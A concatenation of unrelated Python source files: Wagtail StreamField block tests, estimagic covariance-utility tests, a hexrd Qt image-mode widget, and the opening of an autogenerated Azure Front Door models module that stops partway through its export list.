# <script>initDateChooser("dateblock", {"dayOfWeekStart": 0, "format": "Y-m-d"});</script>
# except that we can't predict the order of the config options
self.assertIn('<script>initDateChooser("dateblock", {', result)
self.assertIn('"dayOfWeekStart": 0', result)
self.assertIn('"format": "Y-m-d"', result)
self.assertInHTML(
'<input id="dateblock" name="dateblock" placeholder="" type="text" value="2015-08-13" autocomplete="off" />',
result
)
def test_render_form_with_format(self):
block = blocks.DateBlock(format='%d.%m.%Y')
value = date(2015, 8, 13)
result = block.render_form(value, prefix='dateblock')
self.assertIn('<script>initDateChooser("dateblock", {', result)
self.assertIn('"dayOfWeekStart": 0', result)
self.assertIn('"format": "d.m.Y"', result)
self.assertInHTML(
'<input id="dateblock" name="dateblock" placeholder="" type="text" value="13.08.2015" autocomplete="off" />',
result
)
class TestDateTimeBlock(TestCase):
def test_render_form_with_format(self):
block = blocks.DateTimeBlock(format='%d.%m.%Y %H:%M')
value = datetime(2015, 8, 13, 10, 0)
result = block.render_form(value, prefix='datetimeblock')
self.assertIn(
'"format": "d.m.Y H:i"',
result
)
self.assertInHTML(
'<input id="datetimeblock" name="datetimeblock" placeholder="" type="text" value="13.08.2015 10:00" autocomplete="off" />',
result
)
class TestSystemCheck(TestCase):
def test_name_cannot_contain_non_alphanumeric(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich+text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names should follow standard Python conventions for variable names: alpha-numeric and underscores, and cannot begin with a digit")
self.assertEqual(errors[0].obj, block.child_blocks['rich+text'])
def test_name_must_be_nonempty(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block name cannot be empty")
self.assertEqual(errors[0].obj, block.child_blocks[''])
def test_name_cannot_contain_spaces(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, block.child_blocks['rich text'])
def test_name_cannot_contain_dashes(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich-text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain dashes")
self.assertEqual(errors[0].obj, block.child_blocks['rich-text'])
def test_name_cannot_begin_with_digit(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('99richtext', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot begin with a digit")
self.assertEqual(errors[0].obj, block.child_blocks['99richtext'])
def test_system_checks_recurse_into_lists(self):
failing_block = blocks.RichTextBlock()
block = blocks.StreamBlock([
('paragraph_list', blocks.ListBlock(
blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block),
])
))
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block)
def test_system_checks_recurse_into_streams(self):
failing_block = blocks.RichTextBlock()
block = blocks.StreamBlock([
('carousel', blocks.StreamBlock([
('text', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block),
]))
]))
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block)
def test_system_checks_recurse_into_structs(self):
failing_block_1 = blocks.RichTextBlock()
failing_block_2 = blocks.RichTextBlock()
block = blocks.StreamBlock([
('two_column', blocks.StructBlock([
('left', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block_1),
])),
('right', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block_2),
]))
]))
])
errors = block.check()
self.assertEqual(len(errors), 2)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block_1)
self.assertEqual(errors[1].id, 'wagtailcore.E001')
self.assertEqual(errors[1].hint, "Block names cannot contain spaces")
self.assertEqual(errors[1].obj, failing_block_2)
class TestTemplateRendering(TestCase):
def test_render_with_custom_context(self):
block = CustomLinkBlock()
value = block.to_python({'title': 'Torchbox', 'url': 'http://torchbox.com/'})
context = {'classname': 'important'}
result = block.render(value, context)
self.assertEqual(result, '<a href="http://torchbox.com/" class="important">Torchbox</a>')
def test_render_with_custom_form_context(self):
block = CustomLinkBlock()
value = block.to_python({'title': 'Torchbox', 'url': 'http://torchbox.com/'})
result = block.render_form(value, prefix='my-link-block')
self.assertIn('data-prefix="my-link-block"', result)
self.assertIn('<p>Hello from get_form_context!</p>', result)
class TestIncludeBlockTag(TestCase):
def test_include_block_tag_with_boundblock(self):
"""
The include_block tag should be able to render a BoundBlock's template
while keeping the parent template's context
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr">bonjour</h1></body>', result)
def test_include_block_tag_with_structvalue(self):
"""
The include_block tag should be able to render a StructValue's template
while keeping the parent template's context
"""
block = SectionBlock()
struct_value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': struct_value,
'language': 'fr',
})
self.assertIn(
"""<body><h1 lang="fr">Bonjour</h1>monde <i>italique</i></body>""",
result
)
def test_include_block_tag_with_streamvalue(self):
"""
The include_block tag should be able to render a StreamValue's template
while keeping the parent template's context
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
], template='tests/blocks/stream_with_language.html')
stream_value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': stream_value,
'language': 'fr',
})
self.assertIn('<div class="heading" lang="fr"><h1 lang="fr">Bonjour</h1></div>', result)
def test_include_block_tag_with_plain_value(self):
"""
The include_block tag should be able to render a value without a render_as_block method
by just rendering it as a string
"""
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': 42,
})
self.assertIn('<body>42</body>', result)
def test_include_block_tag_with_filtered_value(self):
"""
The block parameter on include_block tag should support complex values including filters,
e.g. {% include_block foo|default:123 %}
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_test_with_filter.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr">bonjour</h1></body>', result)
result = render_to_string('tests/blocks/include_block_test_with_filter.html', {
'test_block': None,
'language': 'fr',
})
self.assertIn('<body>999</body>', result)
def test_include_block_tag_with_extra_context(self):
"""
Test that it's possible to pass extra context on an include_block tag using
{% include_block foo with classname="bar" %}
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_with_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr" class="important">bonjour</h1></body>', result)
def test_include_block_tag_with_only_flag(self):
"""
A tag such as {% include_block foo with classname="bar" only %}
should not inherit the parent context
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_only_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 class="important">bonjour</h1></body>', result)
class BlockUsingGetTemplateMethod(blocks.Block):
my_new_template = "my_super_awesome_dynamic_template.html"
def get_template(self):
return self.my_new_template
class TestOverriddenGetTemplateBlockTag(TestCase):
def test_template_is_overriden_by_get_template(self):
block = BlockUsingGetTemplateMethod(template='tests/blocks/this_shouldnt_be_used.html')
template = block.get_template()
self.assertEqual(template, block.my_new_template)
|
import numpy as np
import pandas as pd
import pytest
from numpy.testing import assert_array_almost_equal as aaae
from estimagic.config import IS_CYIPOPT_INSTALLED
from estimagic.config import IS_DFOLS_INSTALLED
from estimagic.config import IS_PETSC4PY_INSTALLED
from estimagic.config import IS_PYBOBYQA_INSTALLED
from estimagic.config import IS_PYGMO_INSTALLED
from estimagic.optimization import AVAILABLE_ALGORITHMS
from estimagic.utilities import calculate_trustregion_initial_radius
from estimagic.utilities import chol_params_to_lower_triangular_matrix
from estimagic.utilities import cov_matrix_to_params
from estimagic.utilities import cov_matrix_to_sdcorr_params
from estimagic.utilities import cov_params_to_matrix
from estimagic.utilities import cov_to_sds_and_corr
from estimagic.utilities import dimension_to_number_of_triangular_elements
from estimagic.utilities import hash_array
from estimagic.utilities import number_of_triangular_elements_to_dimension
from estimagic.utilities import robust_cholesky
from estimagic.utilities import robust_inverse
from estimagic.utilities import sdcorr_params_to_matrix
from estimagic.utilities import sdcorr_params_to_sds_and_corr
from estimagic.utilities import sds_and_corr_to_cov
def test_chol_params_to_lower_triangular_matrix():
calculated = chol_params_to_lower_triangular_matrix(pd.Series([1, 2, 3]))
expected = np.array([[1, 0], [2, 3]])
aaae(calculated, expected)
def test_cov_params_to_matrix():
params = np.array([1, 0.1, 2, 0.2, 0.22, 3])
expected = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_params_to_matrix(params)
aaae(calculated, expected)
def test_cov_matrix_to_params():
expected = np.array([1, 0.1, 2, 0.2, 0.22, 3])
cov = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_matrix_to_params(cov)
aaae(calculated, expected)
def test_sdcorr_params_to_sds_and_corr():
sdcorr_params = pd.Series([1, 2, 3, 0.1, 0.2, 0.3])
exp_corr = np.array([[1, 0.1, 0.2], [0.1, 1, 0.3], [0.2, 0.3, 1]])
exp_sds = np.array([1, 2, 3])
calc_sds, calc_corr = sdcorr_params_to_sds_and_corr(sdcorr_params)
aaae(calc_sds, exp_sds)
aaae(calc_corr, exp_corr)
def test_sdcorr_params_to_matrix():
sds = np.sqrt([1, 2, 3])
corrs = [0.07071068, 0.11547005, 0.08981462]
params = np.hstack([sds, corrs])
expected = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = sdcorr_params_to_matrix(params)
aaae(calculated, expected)
def test_cov_matrix_to_sdcorr_params():
sds = np.sqrt([1, 2, 3])
corrs = [0.07071068, 0.11547005, 0.08981462]
expected = np.hstack([sds, corrs])
cov = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_matrix_to_sdcorr_params(cov)
aaae(calculated, expected)
def test_sds_and_corr_to_cov():
sds = [1, 2, 3]
corr = np.ones((3, 3)) * 0.2
corr[np.diag_indices(3)] = 1
calculated = sds_and_corr_to_cov(sds, corr)
expected = np.array([[1.0, 0.4, 0.6], [0.4, 4.0, 1.2], [0.6, 1.2, 9.0]])
aaae(calculated, expected)
def test_cov_to_sds_and_corr():
cov = np.array([[1.0, 0.4, 0.6], [0.4, 4.0, 1.2], [0.6, 1.2, 9.0]])
calc_sds, calc_corr = cov_to_sds_and_corr(cov)
exp_sds = [1, 2, 3]
exp_corr = np.ones((3, 3)) * 0.2
exp_corr[np.diag_indices(3)] = 1
aaae(calc_sds, exp_sds)
aaae(calc_corr, exp_corr)
def test_number_of_triangular_elements_to_dimension():
inputs = [6, 10, 15, 21]
expected = [3, 4, 5, 6]
for inp, exp in zip(inputs, expected):
assert number_of_triangular_elements_to_dimension(inp) == exp
def test_dimension_to_number_of_triangular_elements():
inputs = [3, 4, 5, 6]
expected = [6, 10, 15, 21]
for inp, exp in zip(inputs, expected):
assert dimension_to_number_of_triangular_elements(inp) == exp
def random_cov(dim, seed):
np.random.seed(seed)
num_elements = int(dim * (dim + 1) / 2)
chol = np.zeros((dim, dim))
chol[np.tril_indices(dim)] = np.random.uniform(size=num_elements)
cov = chol @ chol.T
zero_positions = np.random.choice(range(dim), size=int(dim / 5), replace=False)
for pos in zero_positions:
cov[:, pos] = 0
cov[pos] = 0
return cov
seeds = [58822, 3181, 98855, 44002, 47631, 97741, 10655, 4600, 1151, 58189]
dims = [8] * 6 + [10, 12, 15, 20]
@pytest.mark.parametrize("dim, seed", zip(dims, seeds))
def test_robust_cholesky_with_zero_variance(dim, seed):
cov = random_cov(dim, seed)
chol = robust_cholesky(cov)
aaae(chol.dot(chol.T), cov)
assert (chol[np.triu_indices(len(cov), k=1)] == 0).all()
def test_robust_cholesky_with_extreme_cases():
for cov in [np.ones((5, 5)), np.zeros((5, 5))]:
chol = robust_cholesky(cov)
aaae(chol.dot(chol.T), cov)
def test_robust_inverse_nonsingular():
mat = np.eye(3) + 0.2
expected = np.linalg.inv(mat)
calculated = robust_inverse(mat)
aaae(calculated, expected)
def test_robust_inverse_singular():
mat = np.zeros((5, 5))
expected = np.zeros((5, 5))
with pytest.warns(UserWarning, match="LinAlgError"):
calculated = robust_inverse(mat)
aaae(calculated, expected)
def test_hash_array():
arr1 = np.arange(4)[::2]
arr2 = np.array([0, 2])
arr3 = np.array([0, 3])
assert hash_array(arr1) == hash_array(arr2)
assert hash_array(arr1) != hash_array(arr3)
def test_initial_trust_radius_small_x():
x = np.array([0.01, 0.01])
expected = 0.1
res = calculate_trustregion_initial_radius(x)
assert expected == pytest.approx(res, abs=1e-8)
def test_initial_trust_radius_large_x():
x = np.array([20.5, 10])
expected = 2.05
res = calculate_trustregion_initial_radius(x)
assert expected == pytest.approx(res, abs=1e-8)
def test_available_algorithms():
present_algo_names = AVAILABLE_ALGORITHMS.keys()
assert "scipy_lbfgsb" in present_algo_names
assert ("nag_dfols" in present_algo_names) is IS_DFOLS_INSTALLED
assert ("tao_pounders" in present_algo_names) is IS_PETSC4PY_INSTALLED
assert ("nag_pybobyqa" in present_algo_names) is IS_PYBOBYQA_INSTALLED
assert ("pygmo_gaco" in present_algo_names) is IS_PYGMO_INSTALLED
assert ("ipopt" in present_algo_names) is IS_CYIPOPT_INSTALLED
assert "get_scipy_bounds" not in present_algo_names
|
import copy
from functools import partial
import multiprocessing
import numpy as np
from PySide2.QtCore import QObject, QSignalBlocker, Signal
from hexrd.ui.constants import ViewType
from hexrd.ui.create_hedm_instrument import create_hedm_instrument
from hexrd.ui.create_raw_mask import apply_threshold_mask, remove_threshold_mask
from hexrd.ui.hexrd_config import HexrdConfig
from hexrd.ui.ui_loader import UiLoader
class ImageModeWidget(QObject):
# Using string argument instead of ViewType to workaround segfault on
# conda/macos
tab_changed = Signal(str)
# Tell the image canvas to show the snip1d
polar_show_snip1d = Signal()
# Mask has been applied
mask_applied = Signal()
def __init__(self, parent=None):
super(ImageModeWidget, self).__init__(parent)
loader = UiLoader()
self.ui = loader.load_file('image_mode_widget.ui', parent)
# Always start with raw tab
self.ui.tab_widget.setCurrentIndex(0)
self.setup_connections()
self.update_gui_from_config()
def setup_connections(self):
self.ui.raw_tabbed_view.toggled.connect(HexrdConfig().set_tab_images)
self.ui.raw_show_saturation.toggled.connect(
HexrdConfig().set_show_saturation_level)
self.ui.raw_threshold_mask.toggled.connect(self.raw_masking)
self.ui.raw_threshold_mask.toggled.connect(
HexrdConfig().set_threshold_mask_status)
self.ui.raw_threshold_comparison.currentIndexChanged.connect(
HexrdConfig().set_threshold_comparison)
self.ui.raw_threshold_comparison.currentIndexChanged.connect(
self.update_mask)
self.ui.raw_threshold_value.valueChanged.connect(
HexrdConfig().set_threshold_value)
self.ui.raw_threshold_value.valueChanged.connect(
self.update_mask)
self.ui.cartesian_pixel_size.valueChanged.connect(
HexrdConfig()._set_cartesian_pixel_size)
self.ui.cartesian_virtual_plane_distance.valueChanged.connect(
HexrdConfig().set_cartesian_virtual_plane_distance)
self.ui.cartesian_plane_normal_rotate_x.valueChanged.connect(
HexrdConfig().set_cartesian_plane_normal_rotate_x)
self.ui.cartesian_plane_normal_rotate_y.valueChanged.connect(
HexrdConfig().set_cartesian_plane_normal_rotate_y)
self.ui.polar_pixel_size_tth.valueChanged.connect(
HexrdConfig()._set_polar_pixel_size_tth)
self.ui.polar_pixel_size_eta.valueChanged.connect(
HexrdConfig()._set_polar_pixel_size_eta)
self.ui.polar_res_tth_min.valueChanged.connect(
HexrdConfig().set_polar_res_tth_min)
self.ui.polar_res_tth_max.valueChanged.connect(
HexrdConfig().set_polar_res_tth_max)
self.ui.polar_apply_snip1d.toggled.connect(
HexrdConfig().set_polar_apply_snip1d)
self.ui.polar_snip1d_width.valueChanged.connect(
HexrdConfig().set_polar_snip1d_width)
self.ui.polar_snip1d_numiter.valueChanged.connect(
HexrdConfig().set_polar_snip1d_numiter)
HexrdConfig().instrument_config_loaded.connect(
self.auto_generate_cartesian_params)
HexrdConfig().instrument_config_loaded.connect(
self.auto_generate_polar_params)
self.ui.polar_show_snip1d.clicked.connect(self.polar_show_snip1d.emit)
self.ui.tab_widget.currentChanged.connect(self.currentChanged)
HexrdConfig().threshold_mask_changed.connect(
self.ui.raw_threshold_mask.setChecked)
def currentChanged(self, index):
modes = {
0: ViewType.raw,
1: ViewType.cartesian,
2: ViewType.polar
}
ind = self.ui.tab_widget.currentIndex()
self.tab_changed.emit(modes[ind])
def all_widgets(self):
widgets = [
self.ui.raw_tabbed_view,
self.ui.raw_show_saturation,
self.ui.raw_threshold_mask,
self.ui.raw_threshold_comparison,
self.ui.raw_threshold_value,
self.ui.cartesian_pixel_size,
self.ui.cartesian_virtual_plane_distance,
self.ui.cartesian_plane_normal_rotate_x,
self.ui.cartesian_plane_normal_rotate_y,
self.ui.polar_pixel_size_tth,
self.ui.polar_pixel_size_eta,
self.ui.polar_res_tth_min,
self.ui.polar_res_tth_max,
self.ui.polar_apply_snip1d,
self.ui.polar_snip1d_width,
self.ui.polar_snip1d_numiter,
self.ui.polar_show_snip1d
]
return widgets
def update_gui_from_config(self):
blocked = [QSignalBlocker(x) for x in self.all_widgets()] # noqa: F841
self.ui.raw_threshold_comparison.setCurrentIndex(
HexrdConfig().threshold_comparison)
self.ui.raw_threshold_value.setValue(
HexrdConfig().threshold_value)
self.ui.raw_threshold_mask.setChecked(
HexrdConfig().threshold_mask_status)
self.ui.cartesian_pixel_size.setValue(
HexrdConfig().cartesian_pixel_size)
self.ui.cartesian_virtual_plane_distance.setValue(
HexrdConfig().cartesian_virtual_plane_distance)
self.ui.cartesian_plane_normal_rotate_x.setValue(
HexrdConfig().cartesian_plane_normal_rotate_x)
self.ui.cartesian_plane_normal_rotate_y.setValue(
HexrdConfig().cartesian_plane_normal_rotate_y)
self.ui.polar_pixel_size_tth.setValue(
HexrdConfig().polar_pixel_size_tth)
self.ui.polar_pixel_size_eta.setValue(
HexrdConfig().polar_pixel_size_eta)
self.ui.polar_res_tth_min.setValue(
HexrdConfig().polar_res_tth_min)
self.ui.polar_res_tth_max.setValue(
HexrdConfig().polar_res_tth_max)
self.ui.polar_apply_snip1d.setChecked(
HexrdConfig().polar_apply_snip1d)
self.ui.polar_snip1d_width.setValue(
HexrdConfig().polar_snip1d_width)
self.ui.polar_snip1d_numiter.setValue(
HexrdConfig().polar_snip1d_numiter)
def auto_generate_cartesian_params(self):
# This will automatically generate and set values for the
# Cartesian pixel size and virtual plane distance based upon
# values in the instrument config.
# This function does not invoke a re-render.
detectors = list(HexrdConfig().detectors.values())
distances = [
x['transform']['translation']['value'][2] for x in detectors
]
sizes = [x['pixels']['size']['value'] for x in detectors]
average_dist = sum(distances) / len(distances)
average_size = sum([x[0] + x[1] for x in sizes]) / (2 * len(sizes))
cart_config = HexrdConfig().config['image']['cartesian']
cart_config['pixel_size'] = average_size * 5
cart_config['virtual_plane_distance'] = abs(average_dist)
# Get the GUI to update with the new values
self.update_gui_from_config()
def auto_generate_polar_params(self):
# This will automatically generate and set values for the polar
# pixel values based upon the config.
# This function does not invoke a re-render.
manager = multiprocessing.Manager()
keys = ['max_tth_ps', 'max_eta_ps', 'min_tth', 'max_tth']
results = {key: manager.list() for key in keys}
f = partial(compute_polar_params, **results)
instr = create_hedm_instrument()
with multiprocessing.Pool() as pool:
pool.map(f, instr.detectors.values())
# Set these manually so no rerender signals are fired
params = {
'pixel_size_tth': 10 * np.degrees(max(results['max_tth_ps'])),
'pixel_size_eta': 2 * np.degrees(max(results['max_eta_ps'])),
'tth_min': np.degrees(min(results['min_tth'])),
'tth_max': np.degrees(max(results['max_tth']))
}
# Sometimes, this is too big. Bring it down if it is.
px_eta = params['pixel_size_eta']
params['pixel_size_eta'] = px_eta if px_eta < 90 else 5
HexrdConfig().config['image']['polar'].update(params)
# Update all of the materials with the new tth_max
HexrdConfig().reset_tth_max_all_materials()
# Get the GUI to update with the new values
self.update_gui_from_config()
def raw_masking(self, checked):
# Toggle threshold masking on or off
# Creates a copy of the ImageSeries dict so that the images can
# easily be reverted to their original state if the mask is
# toggled off.
self.ui.raw_threshold_comparison.setEnabled(checked)
self.ui.raw_threshold_comparison.setCurrentIndex(
HexrdConfig().threshold_comparison)
self.ui.raw_threshold_value.setEnabled(checked)
self.ui.raw_threshold_value.setValue(HexrdConfig().threshold_value)
if not hasattr(self, 'ims_copy') or self.ims_copy is None:
self.ims_copy = copy.copy(HexrdConfig().imageseries_dict)
self.update_mask(checked)
def update_mask(self, masking):
# Add or remove the mask. This will cause a re-render
if not isinstance(masking, bool) or masking:
apply_threshold_mask(self.ims_copy)
else:
remove_threshold_mask(self.ims_copy)
self.ims_copy = None
self.mask_applied.emit()
def reset_masking(self, checked=False):
self.ui.raw_threshold_mask.setChecked(checked)
def compute_polar_params(panel, max_tth_ps, max_eta_ps, min_tth, max_tth):
# Other than panel, all arguments are lists for appending results
# pixel sizes
ang_ps = panel.angularPixelSize(
np.vstack([i.flatten() for i in panel.pixel_coords]).T
)
max_tth_ps.append(np.max(ang_ps[:, 0]))
max_eta_ps.append(np.max(ang_ps[:, 1]))
# tth ranges
ptth, peta = panel.pixel_angles()
min_tth.append(np.min(ptth))
max_tth.append(np.max(ptth))
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import AzureAsyncOperationResult
from ._models_py3 import Backend
from ._models_py3 import BackendPool
from ._models_py3 import BackendPoolListResult
from ._models_py3 import BackendPoolsSettings
from ._models_py3 import BackendPoolUpdateParameters
from ._models_py3 import CacheConfiguration
from ._models_py3 import CheckNameAvailabilityInput
from ._models_py3 import CheckNameAvailabilityOutput
from ._models_py3 import CustomHttpsConfiguration
from ._models_py3 import CustomRule
from ._models_py3 import CustomRuleList
from ._models_py3 import Endpoint
from ._models_py3 import Error
from ._models_py3 import ErrorDetails
from ._models_py3 import ErrorResponse, ErrorResponseException
from ._models_py3 import Experiment
from ._models_py3 import ExperimentUpdateModel
from ._models_py3 import ForwardingConfiguration
from ._models_py3 import FrontDoor
from ._models_py3 import FrontDoorUpdateParameters
from ._models_py3 import FrontendEndpoint
from ._models_py3 import FrontendEndpointLink
from ._models_py3 import FrontendEndpointUpdateParameters
from ._models_py3 import FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink
from ._models_py3 import HeaderAction
from ._models_py3 import HealthProbeSettingsListResult
from ._models_py3 import HealthProbeSettingsModel
from ._models_py3 import HealthProbeSettingsUpdateParameters
from ._models_py3 import KeyVaultCertificateSourceParametersVault
from ._models_py3 import LatencyMetric
from ._models_py3 import LatencyScorecard
from ._models_py3 import LoadBalancingSettingsListResult
from ._models_py3 import LoadBalancingSettingsModel
from ._models_py3 import LoadBalancingSettingsUpdateParameters
from ._models_py3 import ManagedRuleDefinition
from ._models_py3 import ManagedRuleExclusion
from ._models_py3 import ManagedRuleGroupDefinition
from ._models_py3 import ManagedRuleGroupOverride
from ._models_py3 import ManagedRuleOverride
from ._models_py3 import ManagedRuleSet
from ._models_py3 import ManagedRuleSetDefinition
from ._models_py3 import ManagedRuleSetList
from ._models_py3 import MatchCondition
from ._models_py3 import PolicySettings
from ._models_py3 import PreconfiguredEndpoint
from ._models_py3 import Profile
from ._models_py3 import ProfileUpdateModel
from ._models_py3 import PurgeParameters
from ._models_py3 import RedirectConfiguration
from ._models_py3 import Resource
from ._models_py3 import RouteConfiguration
from ._models_py3 import RoutingRule
from ._models_py3 import RoutingRuleLink
from ._models_py3 import RoutingRuleListResult
from ._models_py3 import RoutingRuleUpdateParameters
from ._models_py3 import RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink
from ._models_py3 import RulesEngine
from ._models_py3 import RulesEngineAction
from ._models_py3 import RulesEngineMatchCondition
from ._models_py3 import RulesEngineRule
from ._models_py3 import RulesEngineUpdateParameters
from ._models_py3 import SubResource
from ._models_py3 import TagsObject
from ._models_py3 import Timeseries
from ._models_py3 import TimeseriesDataPoint
from ._models_py3 import ValidateCustomDomainInput
from ._models_py3 import ValidateCustomDomainOutput
from ._models_py3 import WebApplicationFirewallPolicy
except (SyntaxError, ImportError):
from ._models import AzureAsyncOperationResult
from ._models import Backend
from ._models import BackendPool
from ._models import BackendPoolListResult
from ._models import BackendPoolsSettings
from ._models import BackendPoolUpdateParameters
from ._models import CacheConfiguration
from ._models import CheckNameAvailabilityInput
from ._models import CheckNameAvailabilityOutput
from ._models import CustomHttpsConfiguration
from ._models import CustomRule
from ._models import CustomRuleList
from ._models import Endpoint
from ._models import Error
from ._models import ErrorDetails
from ._models import ErrorResponse, ErrorResponseException
from ._models import Experiment
from ._models import ExperimentUpdateModel
from ._models import ForwardingConfiguration
from ._models import FrontDoor
from ._models import FrontDoorUpdateParameters
from ._models import FrontendEndpoint
from ._models import FrontendEndpointLink
from ._models import FrontendEndpointUpdateParameters
from ._models import FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink
from ._models import HeaderAction
from ._models import HealthProbeSettingsListResult
from ._models import HealthProbeSettingsModel
from ._models import HealthProbeSettingsUpdateParameters
from ._models import KeyVaultCertificateSourceParametersVault
from ._models import LatencyMetric
from ._models import LatencyScorecard
from ._models import LoadBalancingSettingsListResult
from ._models import LoadBalancingSettingsModel
from ._models import LoadBalancingSettingsUpdateParameters
from ._models import ManagedRuleDefinition
from ._models import ManagedRuleExclusion
from ._models import ManagedRuleGroupDefinition
from ._models import ManagedRuleGroupOverride
from ._models import ManagedRuleOverride
from ._models import ManagedRuleSet
from ._models import ManagedRuleSetDefinition
from ._models import ManagedRuleSetList
from ._models import MatchCondition
from ._models import PolicySettings
from ._models import PreconfiguredEndpoint
from ._models import Profile
from ._models import ProfileUpdateModel
from ._models import PurgeParameters
from ._models import RedirectConfiguration
from ._models import Resource
from ._models import RouteConfiguration
from ._models import RoutingRule
from ._models import RoutingRuleLink
from ._models import RoutingRuleListResult
from ._models import RoutingRuleUpdateParameters
from ._models import RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink
from ._models import RulesEngine
from ._models import RulesEngineAction
from ._models import RulesEngineMatchCondition
from ._models import RulesEngineRule
from ._models import RulesEngineUpdateParameters
from ._models import SubResource
from ._models import TagsObject
from ._models import Timeseries
from ._models import TimeseriesDataPoint
from ._models import ValidateCustomDomainInput
from ._models import ValidateCustomDomainOutput
from ._models import WebApplicationFirewallPolicy
from ._paged_models import ExperimentPaged
from ._paged_models import FrontDoorPaged
from ._paged_models import FrontendEndpointPaged
from ._paged_models import ManagedRuleSetDefinitionPaged
from ._paged_models import PreconfiguredEndpointPaged
from ._paged_models import ProfilePaged
from ._paged_models import RulesEnginePaged
from ._paged_models import WebApplicationFirewallPolicyPaged
from ._front_door_management_client_enums import (
NetworkOperationStatus,
NetworkExperimentResourceState,
State,
AggregationInterval,
TimeseriesType,
EndpointType,
FrontDoorResourceState,
CustomHttpsProvisioningState,
CustomHttpsProvisioningSubstate,
FrontDoorCertificateSource,
MinimumTLSVersion,
FrontDoorCertificateType,
EnforceCertificateNameCheckEnabledState,
FrontDoorEnabledState,
FrontDoorProtocol,
RoutingRuleEnabledState,
FrontDoorForwardingProtocol,
FrontDoorQuery,
DynamicCompressionEnabled,
FrontDoorRedirectType,
FrontDoorRedirectProtocol,
PrivateEndpointStatus,
BackendEnabledState,
FrontDoorHealthProbeMethod,
HealthProbeEnabled,
SessionAffinityEnabledState,
HeaderActionType,
RulesEngineMatchVariable,
RulesEngineOperator,
Transform,
MatchProcessingBehavior,
ResourceType,
Availability,
PolicyEnabledState,
PolicyMode,
CustomRuleEnabledState,
RuleType,
MatchVariable,
Operator,
TransformType,
ActionType,
ManagedRuleExclusionMatchVariable,
ManagedRuleExclusionSelectorMatchOperator,
ManagedRuleEnabledState,
PolicyResourceState,
LatencyScorecardAggregationInterval,
TimeseriesAggregationInterval,
)
__all__ = [
'AzureAsyncOperationResult',
'Backend',
'BackendPool',
'BackendPoolListResult',
'BackendPoolsSettings',
'BackendPoolUpdateParameters',
'CacheConfiguration',
'CheckNameAvailabilityInput',
'CheckNameAvailabilityOutput',
'CustomHttpsConfiguration',
'CustomRule',
'CustomRuleList',
'Endpoint',
